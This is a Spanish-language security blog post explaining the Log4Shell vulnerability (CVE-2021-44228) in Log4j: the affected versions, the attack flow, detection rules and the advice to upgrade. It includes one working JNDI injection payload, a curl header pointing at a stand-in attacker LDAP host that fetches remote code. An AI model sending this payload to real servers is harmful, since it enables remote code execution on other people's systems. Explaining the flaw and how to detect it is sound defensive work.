Buscar

11 diciembre 2021

LOG4SHell otro RCE (CVE-2021-44228)

  diciembre 11, 2021 akil3s   , , ,   No comments   Edit

Hace unos días (9 de diciembre) apareció un nuevo RCE, aunque se dio a conocer el 24 de noviembre a través del equipo de seguridad de Alibaba Cloud.

LOG4SHell es un Zero day en la biblioteca de registro de Java log4j2 que da por resultado un RCE (ejecución de código remota) a través del registro de una string concreta.

Log4j es una biblioteca de código abierto desarrollada en Java por la Apache Software Foundation que permite a los desarrolladores de software escribir mensajes de registro (segun wikipedia).

La vulnerabilidad se ha registrado como CVE-2021-44228. Esta se considera de carácter crítico, ya que aparece con un CVE de 10 (el más alto).

Log4j es un sistema bastante utilizado, por lo que se están viendo afectados desde servicios en la nube, como iCloud hasta aplicaciones como Minecraft (hay POC sobre esto). Por ello, cualquier aplicación que use SpringBoot con Java, seguramente esté expuesta en este momento.

Si tienes instalada una versión desde la 2.0 a la 2.14.1 eres vulnerable a este RCE. Aunque según cuentan desde Alibaba, el software concreto afectado sería:

  • Apache Flink
  • Apache Solr
  • Apache Druid
  • Apache Struts2 (recordemos que este ya tuvo su CVE el año pasado)

Un atacante, podría enviar una solicitud maliciosa al servidor atacado a través del protocolo HTTP (Curl, o cualquier otro). El servidor recibiría la solicitud. La versión vulnerable de Log4j permitiría su ejecución, y el servidor atacado realizaría una petición a un servidor del atacante que se "traería" el exploit (fichero culo.class, por ejemplo xD), el cual se inyectaría en el servidor víctima y, por último, ese exploit se ejecutaría:

curl X.X.X.X:8000 -H 'X-Api-Version: ${jndi:ldap://culo.es/exp}'

Para una explicación más completa acerca de la POC, puedes visitar este GitHub.

Cas van Cooten tuiteó el mismo día 10, que simplemente con cambiar el nombre en un iPhone, desencadena dicha vulnerabilidad. 


Para detectar este ataque, hay un repositorio de GitHub de cyb3rops con reglas de Yara (herramienta para la detección de malware basada en reglas). Además, se han añadido ya a IDS como Snort o Suricata.

Actualización:

Parece ser que con la versión 2.15.0 de Log4j se corregiría este problema, así que, ya sabes. Si tienes alguna de las versiones afectadas, ¡actualiza ya!

Nos vemos en la siguiente.

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)